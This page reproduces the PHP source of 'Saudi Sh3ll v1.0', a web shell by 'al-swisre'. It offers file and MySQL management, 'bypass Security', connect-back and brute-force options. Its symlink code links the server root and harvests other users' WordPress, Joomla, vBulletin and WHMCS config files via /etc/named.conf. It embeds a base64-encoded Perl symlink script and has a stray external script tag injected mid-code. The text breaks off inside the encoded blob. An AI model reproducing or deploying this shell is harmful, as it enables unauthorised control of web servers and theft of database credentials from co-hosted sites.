
Saudi Sh3ll v1.0 Script

01 Mar 2014

Saudi Sh3ll v1.0, by al-swisre

Saudi Sh3ll v1.0 Source Code

   1 <?
   2 ob_start();
   3 ?>
   4 
   5 <?php
   6 
   7 ###
   8 ###
   9 ###
  10 ###
  11 ###
  12 ###
  13 ###
  14 ###
  15 ###
  16 ###
  17 ###
  18 ###
  19 ###
  20 ###
  21 ###
  22 ###
  23 ###
  24 ###
  25 ###
  26 ###\
  27 #                                        #
  28 #            Saudi Sh3ll v1.0            #
  29 #                                        #
  30 #             by al-swisre               #
  31 #                                        #
  32 
  33 ###
  34 ###
  35 ###
  36 ###
  37 ###
  38 ###
  39 ###
  40 ###
  41 ###
  42 ###
  43 ###
  44 ###
  45 ###
  46 ###
  47 ###
  48 ###
  49 ###
  50 ###
  51 ###
  52 ###/
  53 
  54 
  55 $auth = 1;
  56 $name='ec371748dc2da624b35a4f8f685dd122'; // Saudi
  57 $pass='ec371748dc2da624b35a4f8f685dd122'; // Saudi
  58 if($auth == 1) {
  59 if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
  60    {
  61    header('WWW-Authenticate: Basic realm="Saudi Sh3ll v1.0"');
  62    header('HTTP/1.0 401 Unauthorized');
  63    exit("<b></b>");
  64    }
  65 }
  66 ?>
  67 
  68 
  69 <?
  70 
  71 
  72 
  73 
  74 
  75 
  76 @set_time_limit(0);
  77 @error_reporting(0);
  78 
  79 
  80 if ($_GET['sws']== 'phpinfo')
  81 {
  82 
  83 echo @phpinfo();
  84 
  85 exit;
  86 
  87 }
  88 
  89 
  90 
  91 echo '
  92 
  93 
  94 <title>'.$_SERVER['HTTP_HOST'].' ~ Saudi Sh3ll</title>
  95 <meta http-equiv="content=type"  content="text/html; charset=utf-8" />
  96 
  97 
  98 
  99 
 100 
 101 <style type="text/css">
 102   html,body {
 103      margin-top: 5px ;
 104      padding: 0;
 105      outline: 0;
 106 }
 107 
 108 
 109 body {
 110 
 111     direction: ltr;
 112     background-color: #000000;
 113     color: #CCCCCC;
 114     font-family: Tahoma, Arial, sans-serif;
 115     font-weight: bold;
 116     text-align: center ;
 117 }
 118 
 119 input,textarea,select{
 120 font-weight: bold;
 121 color: #FFFFFF;
 122 dashed #ffffff;
 123 border: 1px dotted #003300;
 124 background-color: black;
 125 padding: 3px
 126 }
 127 
 128 input:hover{
 129 box-shadow:0px 0px 4px #009900;
 130 
 131 }
 132 .cont a
 133 
 134 {
 135 
 136 
 137 text-decoration: none;
 138 color: #FFFFFF;
 139 
 140 
 141 
 142 }
 143 .hedr
 144 {
 145 font-size:32px;
 146 color: #009900;
 147 text-shadow: 0px 0px 4px #003300 ;
 148 
 149 
 150 
 151 }
 152 
 153 
 154 
 155 .td1{
 156 
 157 
 158     border: 1px dotted #022B04;
 159     padding: 8px;
 160     border-radius: 20px;
 161     text-shadow: 0px 0px 2px #003300;
 162     font-size: 10px;
 163     font-family: Tahoma;
 164     font-weight: bold;
 165 
 166 }
 167 
 168 .td1 tr{}
 169 
 170 .lol{
 171   text-align: left;
 172   float: left;
 173   background: #990000;
 174 }
 175 .nop{
 176 
 177 width: 180px;
 178 text-align: center;
 179 font-size: 15px;
 180 font-family:Tahoma;
 181 color: #003300;
 182 
 183 
 184 
 185 }
 186 .nop a{
 187   text-decoration: none;
 188   color: #003300 ;
 189   text-shadow: none;
 190   width: 80px;
 191   padding: 8px
 192 
 193 
 194 }
 195 .nop a:hover{
 196   color: #FFFFFF;
 197  box-shadow: 0px 0px 4px #006600 ;
 198 
 199 
 200 
 201   }
 202 a
 203 {
 204 text-decoration: none;
 205 color: #006600;
 206 
 207 }
 208 
 209 
 210 .tmp tr td:hover{
 211 
 212 box-shadow: 0px 0px 4px #EEEEEE;
 213 
 214 }
 215 .fot{
 216 
 217 font-family:Tahoma, Arial, sans-serif;
 218 
 219   font-size: 13pt;
 220 }
 221 
 222 .ir {
 223   color: #FF0000;
 224 }
 225 
 226 .cont
 227 {
 228 float:right;
 229 color: #FFFFFF;
 230 box-shadow: 0px 0px 4px #003300;
 231 font-size: 13px;
 232 padding: 8px
 233 
 234 }
 235 
 236 .cont a{
 237 
 238  text-decoration: none;
 239  color: #FFFFFF;
 240  font-family: Tahoma, Arial, sans-serif  ;
 241  font-size: 13px;
 242  text-shadow: 0px 0px 3px ;
 243 }
 244 
 245 .cont a:hover{
 246 
 247 
 248   color: #FF0000 ;
 249   text-shadow:0px 0px 3px #FF0000 ;
 250 
 251 
 252 }
 253 
 254 .cont3
 255 {
 256 color: #FFFFFF;
 257 font-size: 15px;
 258 padding: 8px
 259 
 260 }
 261 
 262 .cont3 a{
 263 
 264  text-decoration: none;
 265  color: #FFFFFF;
 266  font-family: Tahoma, Arial, sans-serif  ;
 267  font-size: 15px;
 268  text-shadow: 0px 0px 3px ;
 269 }
 270 
 271 .cont3 a:hover{
 272 
 273 
 274   color: #FF0000 ;
 275   text-shadow:0px 0px 3px #FF0000 ;
 276 
 277 
 278 }
 279 
 280 .tmp tr td{
 281 
 282 border: dotted 1px #003300;
 283 
 284 padding: 4px ;
 285 font-size: 14px;
 286 }
 287 
 288 .tmp tr td a {
 289   text-decoration: none;
 290 
 291 }
 292 .cmd
 293 {
 294 
 295 float:right;
 296 
 297 }
 298  .tbm{
 299  font-size: 14px;
 300 }
 301 
 302 .tbm tr td{
 303  border: dashed 1px #111111;
 304 
 305 }
 306 .hr{
 307 
 308 border: dotted 1px #003300;
 309 padding: 5px ;
 310 font-size: 13px;
 311 color: white ;
 312 text-shadow: 0px 0px 3px ;
 313 }
 314 
 315 .hr2{
 316 
 317 border: dotted 1px #003300;
 318 padding: 5px ;
 319 font-size: 13px;
 320 color: red ;
 321 text-shadow: 0px 0px 3px ;
 322 }
 323 
 324 .t3p{
 325 width: 100%;
 326 
 327 }
 328 
 329 .t3p{margin-left: 45px ;}
 330 
 331 .t33p{margin-left: 45px ;}
 332 
 333 
 334 .t3p tr td{
 335 
 336 border:  solid 1px #002F00;
 337 padding: 2px ;
 338 font-size: 13px;
 339 text-align: center ;
 340 font-weight: bold;
 341 margin-left: 20px ;
 342 
 343 }
 344 .t3p tr td:hover{
 345 
 346 box-shadow: 0px 0px 4px #009900;
 347 
 348 }
 349 
 350 
 351 .info {margin-left: 100px ; }
 352 
 353 .info tr td
 354 {
 355 
 356 border:  solid 1px #002F00;
 357 padding: 5px ;
 358 font-size: 13px;
 359 text-align: center ;
 360 font-weight: bold;
 361 
 362 
 363 }
 364 .conn{width: 70%;}
 365 
 366 .conn tr td{
 367 border: 1px dashed #003300;
 368 padding: 5px ;
 369 font-size: 13px;
 370 text-align: center ;
 371 font-weight: bold;
 372 
 373 }
 374 
 375 
 376 .lol a{
 377 
 378 font-size: 10px;
 379 
 380 }
 381 
 382 .d0n{
 383 width: 90%;
 384 border-top:  solid 1px #003300;
 385 
 386 }
 387 .d0n tr td{
 388 font-weight: bold;
 389 color: #FFFFFF;
 390  font-family: Tahoma, Arial, sans-serif  ;
 391  font-size: 13px;
 392  margin-left: 110px ;
 393 
 394 
 395 }
 396 .site
 397 {
 398 
 399 font-weight: bold;
 400 width: 50%;
 401 box-shadow: 0px 0px 2px #003300;
 402 
 403 
 404 }
 405 
 406 .ab
 407 {
 408 box-shadow: 0px 0px 6px #444444;
 409 width: 70%;
 410 padding: 10px ;
 411 
 412 }
 413 
 414 .ab tr td
 415 {
 416 text-align: center ;
 417 font-weight: bold;
 418  font-family: Tahoma, Arial, sans-serif  ;
 419   font-size: 13px;
 420  color: white;
 421   text-shadow: 0px 0px 2px white ;
 422 
 423 
 424 }
 425 .ab tr td b
 426 {
 427 color:red ;
 428 text-shadow: 0px 0px 2px red ;
 429 }
 430 .ab tr td a
 431 {
 432  color: white;
 433   text-shadow: 0px 0px 2px white ;
 434 
 435 }
 436 .ab tr td a:hover
 437 {
 438 color:#006600 ;
 439 text-shadow: none ;
 440 }
 441 
 442 .bru
 443 {
 444 color: #FFFFFF;
 445 font-family: Tahoma, Arial, sans-serif  ;
 446 font-size: 14px;
 447 text-shadow: 0px 0px 3px #000000 ;
 448 
 449 }
 450 
 451 .foter
 452 {
 453 
 454 color: #003300;
 455  font-family: Tahoma, Arial, sans-serif  ;
 456  font-size: 11px;
 457  text-shadow: 0px 0px 3px #000000 ;
 458 
 459 
 460 }
 461 
 462 
 463 
 464 
 465 
 466 
 467 
 468 </style>
 469 
 470 ';
 471 
 472 echo '
 473 
 474 <table width="95%" cellspacing="0" cellpadding="0" class="tb1" >
 475 
 476           <td width="15%" valign="top" rowspan="2">
 477             <div class="hedr"> <img src="http://im11.gulfup.com/2012-02-03/1328267135241.png" align="left" alt="Saudi Shell" > </div>
 478              </td>
 479 
 480         <td height="100" align="left" class="td1"   >
 481 
 482 ';
 483 
 484 $pg = basename(__FILE__);
 485 
 486 echo "OS : <b><font color=green>";
 487 $safe_mode = @ini_get('safe_mode');
 488 $dir = @getcwd();
 489 $ip=$_SERVER['REMOTE_ADDR'];
 490 $ips=$_SERVER['SERVER_ADDR'];
 491 define('SWS','al-swisre');
 492 
 493 if ($os)
 494 {
 495 
 496 
 497 }
 498 else
 499 {
 500   $os = @php_uname();
 501   echo $os ;
 502 }
 503 echo "&nbsp;&nbsp;&nbsp;[ <a style='text-decoration: none; color: #003300; text-shadow: 2px 2px 7px #003300;   ' target='_blank' href='http://www.google.com.sa/search?hl=ar&safe=active&client=firefox-a&hs=9Xx&rls=org.mozilla%3Aar%3Aofficial&q=$os&oq=$os&aq=f&aqi=&aql=&gs_sm=e&gs_upl=5759106l5781953l0l5782411l1l1l0l0l0l0l0l0ll0l0'>Google</a> ]";
 504 echo "&nbsp;&nbsp;&nbsp;[ <a style='text-decoration: none; color: #003300; text-shadow: 2px 2px 7px #003300;   ' target='_blank' href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$os&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve='>exploit-db</a> ]";
 505 echo "</font><br /></b>";
 506 
 507 echo (($safe_mode)?("safe_mode &nbsp;: <b><font color=red>ON</font></b>"):("safe_mode: <b><font color=green>OFF</font></b>"));
 508 echo "<br />disable_functions : ";
 509 if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{
 510 
 511 
 512 echo "<font color=red>$df</font></b>";
 513 <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
 514 }
 515 
 516 echo "<br />Server :&nbsp;<font color=green>".$_SERVER['SERVER_SOFTWARE']."</font><br>";
 517 
 518 echo "PHP version : <b><font color=green>".@phpversion()."</font></b><br />";
 519 
 520 
 521 echo "Id : <font color=green><b>"."user = ".@get_current_user()." | uid= ".@getmyuid()." | gid= ".@getmygid()."</font></b><br />";
 522 
 523 echo "Pwd : <font color=green><b>".$dir."&nbsp;&nbsp;".wsoPermsColor($dir)."</font></b>&nbsp;&nbsp;[ <a href='$pg'>Home</a> ]<br /><br /><br />";
 524 
 525 
 526 echo "Your ip :&nbsp;<font ><b><a style='text-decoration: none; color: #FF0000;' href='http://whatismyipaddress.com/ip/$ip' target='_blank' >$ip &nbsp;&nbsp;</a></font></b>
 527 
 528  | ip server :&nbsp;<a style='text-decoration: none; color: #FF0000;' href='http://whatismyipaddress.com/ip/$ips' target='_blank' >$ips</a></font></b>
 529 
 530 | &nbsp;<a style='text-decoration: none; color: #FF0000;' href='$pg?sws=site' target='_blank' >list site</a></font></b>
 531 | &nbsp;<a style='text-decoration: none; color: #FF0000;' href='?sws=phpinfo' target='_blank' >phpinfo</a></font></b> |";
 532 
 533 
 534 
 535 
 536 
 537 
 538 
 539 
 540 
 541  echo "
 542 <br />
 543 
 544 
 545 
 546 
 547 
 548 
 549 
 550 
 551         </tr>
 552         </table>
 553 
 554 <table cellspacing='0' cellpadding='0'  style=' margin:9px'>
 555 
 556     <tr>
 557           <td  rowspan='2' class='td1' valign='top' >
 558 
 559 
 560         <div class='nop'>
 561 
 562          <br /><a href='$pg' >File Manager</a> <br /> <br />
 563          <a href='$pg?sws=info' >More info</a> <br /><br />
 564          <a href='$pg?sws=ms' >Mysql Manager</a> <br /><br />
 565          <a href='$pg?sws=byp' >bypass Security</a> <br /><br />
 566          <a href='$pg?sws=sm' >Symlink</a> <br /><br />
 567          <a href='$pg?sws=con' >Connect Back</a> <br /><br />
 568          <a href='?sws=brt' >BruteForce</a> <br /><br />
 569          <a href='$pg?sws=ab' >About Por</a> <br />
 570 
 571 
 572 
 573         </div>
 574 
 575     ";
 576 
 577 
 578 
 579 
 580 
 581 echo '
 582 
 583 <td  height="444" width="82%"  align="center" valign="top">
 584 
 585 ';
 586 
 587 
 588 if(isset($_REQUEST['sws']))
 589 {
 590 
 591 switch ($_REQUEST['sws'])
 592 {
 593 
 594 
 595 ////////////////////////////////////////////////// Symlink //////////////////////////////////////
 596 
 597 case 'sm':
 598 
 599 $sws = 'al-swisre' ;
 600 
 601 $mk = @mkdir('sym',0777);
 602 
 603 
 604 
 605 $htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
 606 $f =@fopen ('sym/.htaccess','w');
 607 
 608 
 609 @fwrite($f , $htcs);
 610 
 611 
 612 $sym = @symlink("/","sym/root");
 613 
 614 
 615 
 616 
 617 $pg = basename(__FILE__);
 618 
 619 
 620 
 621 echo '<div class="cont3">
 622 [ <a href="?sws=sm"> Symlink File </a>]
 623 
 624 [<a href="?sws=sm&sy=sym"> User & Domains & Symlink </a>]
 625 
 626 [<a href="?sws=sm&sy=sec"> Domains & Script </a>]
 627 
 628 [ <a href="?sws=sm&sy=pl">Make Symlink Perl</a>]
 629 </div><br /><br />'  ;
 630 
 631 ////////////////////////////////// file ////////////////////////
 632 $sws = 'al-swisre' ;
 633 
 634 if(isset($_REQUEST['sy']))
 635 {
 636 
 637 switch ($_REQUEST['sy'])
 638 {
 639 
 640 
 641 
 642 
 643 
 644 /// Domains + Scripts  ///
 645 
 646 case 'sec':
 647 
 648 
 649 $d00m = @file("/etc/named.conf");
 650 
 651 if(!$d00m)
 652 {
 653 die (" can't read /etc/named.conf");
 654 }
 655 else
 656 
 657 {
 658 echo "<div class='tmp'>
 659 <table align='center' width='40%'><td> Domains </td><td> Script </td>";
 660 foreach($d00m as $dom){
 661 
 662 if(eregi("zone",$dom)){
 663 
 664 preg_match_all('#zone "(.*)"#', $dom, $domsws);
 665 
 666 flush();
 667 
 668 if(strlen(trim($domsws[1][0])) > 2){
 669 
 670 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
 671 
 672 ///////////////////////////////////////////////////////////////////////////////////
 673 
 674 $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
 675 $wpp=@get_headers($wpl);
 676 $wp=$wpp[0];
 677 
 678 $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
 679 $wpp2=@get_headers($wp2);
 680 $wp12=$wpp2[0];
 681 
 682 ///////////////////////////////
 683 
 684 $jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
 685 $joo=@get_headers($jo1);
 686 $jo=$joo[0];
 687 
 688 
 689 $jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
 690 $joo2=@get_headers($jo2);
 691 $jo12=$joo2[0];
 692 
 693 ////////////////////////////////
 694 
 695 $vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
 696 $vbb=@get_headers($vb1);
 697 $vb=$vbb[0];
 698 
 699 $vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
 700 $vbb2=@get_headers($vb2);
 701 $vb12=$vbb2[0];
 702 
 703 $vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
 704 $vbb3=@get_headers($vb3);
 705 $vb13=$vbb3[0];
 706 
 707 /////////////////
 708 
 709 $wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
 710 $whh2=@get_headers($wh1);
 711 $wh=$whh2[0];
 712 
 713 $wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
 714 $whh2=@get_headers($wh2);
 715 $wh12=$whh2[0];
 716 
 717 $wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
 718 $whh3=@get_headers($wh3);
 719 $wh13=$whh3[0];
 720 
 721 $wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
 722 $whh5=@get_headers($wh5);
 723 $wh15=$whh5[0];
 724 
 725 $wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
 726 $whh4=@get_headers($wh4);
 727 $wh14=$whh4[0];
 728 
 729 
 730 
 731 ////////////////////////////////////////////////////////////////////////////////
 732 
 733  ////////// WordPress ////////////
 734 
 735 $pos = strpos($wp, "200");
 736 $config="&nbsp;";
 737 
 738 if (strpos($wp, "200") == true )
 739 {
 740  $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
 741 }
 742 elseif (strpos($wp12, "200") == true)
 743 {
 744   $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
 745 }
 746 
 747 ///////////WHMCS////////
 748 
 749 elseif (strpos($jo, "200")  == true and strpos($wh15, "200")  == true )
 750 {
 751   $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";
 752 
 753 }
 754 elseif (strpos($wh12, "200")  == true)
 755 {
 756   $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
 757 }
 758 
 759 elseif (strpos($wh13, "200")  == true)
 760 {
 761   $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";
 762 
 763 }
 764 
 765 ///////// Joomla to 4 ///////////
 766 
 767 elseif (strpos($jo, "200")  == true)
 768 {
 769   $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
 770 }
 771 
 772 elseif (strpos($jo12, "200")  == true)
 773 {
 774   $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
 775 }
 776 
 777 //////////vBulletin to 4 ///////////
 778 
 779 elseif (strpos($vb, "200")  == true)
 780 {
 781   $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
 782 }
 783 
 784 elseif (strpos($vb12, "200")  == true)
 785 {
 786   $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
 787 }
 788 
 789 elseif (strpos($vb13, "200")  == true)
 790 {
 791   $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
 792 }
 793 
 794 else
 795 {
 796  continue;
 797 }
 798 
 799 /////////////////////////////////////////////////////////////////////////////////////
 800 
 801 
 802 
 803 $site = $user['name'] ;
 804 
 805 
 806 
 807 
 808 echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
 809 <td>".$config."</td></tr>"; flush();
 810 exit;
 811 
 812 }
 813 }
 814 }
 815 }
 816 
 817 
 818 
 819 
 820 break;
 821 
 822 
 823 /// user + domine + symlink  ///
 824 
 825 case 'sym':
 826 
 827 $d00m = @file("/etc/named.conf");
 828 
 829 if(!$d00m)
 830 {
 831 die (" can't read /etc/named.conf");
 832 }
 833 else
 834 
 835 {
 836 echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
 837 foreach($d00m as $dom){
 838 
 839 if(eregi("zone",$dom)){
 840 
 841 preg_match_all('#zone "(.*)"#', $dom, $domsws);
 842 
 843 flush();
 844 
 845 if(strlen(trim($domsws[1][0])) > 2){
 846 
 847 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
 848 
 849 
 850 
 851 $site = $user['name'] ;
 852 
 853 
 854 @symlink("/","sym/root");
 855 
 856 $site = $domsws[1][0];
 857 
 858 $ir = 'ir';
 859 
 860 $il = 'il';
 861 
 862 if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
 863 {
 864 $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
 865 }
 866 
 867 
 868 echo "
 869 <tr>
 870 
 871 <td>
 872 <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
 873 </td>
 874 
 875 
 876 <td>
 877 ".$user['name']."
 878 </td>
 879 
 880 
 881 
 882 
 883 
 884 
 885 <td>
 886 <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
 887 </td>
 888 
 889 
 890 </tr></div> ";
 891 
 892 
 893 flush();
 894 
 895 }
 896 }
 897 }
 898 }
 899 
 900 
 901 
 902 
 903 break;
 904 
 905 case 'pl':
 906 
 907 if (!is_dir('sa2')){
 908 
 909 $mk = @mkdir('sa2',0777);
 910 
 911 
 912 
 913 if (is_file('sa2/perl.pl'))
 914 {
 915 
 916 
 917 echo "<a href='sa2/perl.pl' target='_blank'>Symlink Perl</a>";
 918 
 919 
 920 @chmod('sa2/perl.pl',0755);
 921 
 922 
 923 
 924 
 925 }
 926 else
 927 {
 928 
 929 
 930 
 931 
 932 $f2 =@fopen ('sa2/perl.pl','w');
 933 
 934 
 935 $sml_perl = "IyEvdXNyL2Jpbi9wZXJsIC1JL2hvbWUvYWxqbm9mcWUvcHVibGljX2h0bWwvdHJhZmlxL2dvbmZpZy5wbA0KcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7DQpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIiAvPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+DQo8dGl0bGU+W35dIFBhaW4gU3ltbGluazwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IFRhaG9tYTsNCiBmb250LXNpemU6IHgtc21hbGw7DQogZm9udC13ZWlnaHQ6IGJvbGQ7DQogY29sb3I6ICMwMEZGRkY7DQogIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCjwvc3R5bGU+DQo8L2hlYWQ+DQonOw0Kc3ViIGxpbHsNCiAgICAoJHVzZXIpID0gQF87DQokbXNyID0gcXh7cHdkfTsNCiRrb2xhPSRtc3IuIi8iLiR1c2VyOw0KJGtvbGE9fnMvXG4vL2c7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+dkJ1bGxldGluMS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nfn52QnVsbGV0aW4yLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLid+fnZCdWxsZXRpbjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2MvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+dkJ1bGxldGluNC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nfn5QaHBiYjEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+UGhwYmIyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLid+fldvcmRwcmVzczEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nfn5Xb3JkcHJlc3MyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5Kb29tbGExLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci
4nL3B1YmxpY19odG1sL2Jsb2cvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fkpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvam9vbWxhL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5Kb29tbGEzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htMS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG0yLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fldobTMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG00LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG01LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fldobTYudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htNy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htOC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vcmRlci9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htOS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJGtvbGEuJ35+NS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25maWcucGhwJywka29sYS4nfn40LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZfZ2xvYmFsLnBocCcsJGtvbGEuJ35+aW52aXNpby50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2RiLnBocCcsJGtvbGEuJ35+Ny50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25uZWN0LnBocCcsJGtvbGEuJ35+OC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ta19jb25mLnBocCcsJGtvbGEuJ35+bWstcG9ydGFsZTEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9jb25maWcucGhwJywka29sYS4nfn4xMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZXR0aW5ncy5waHAnLCRrb2xhLid+flNtZi
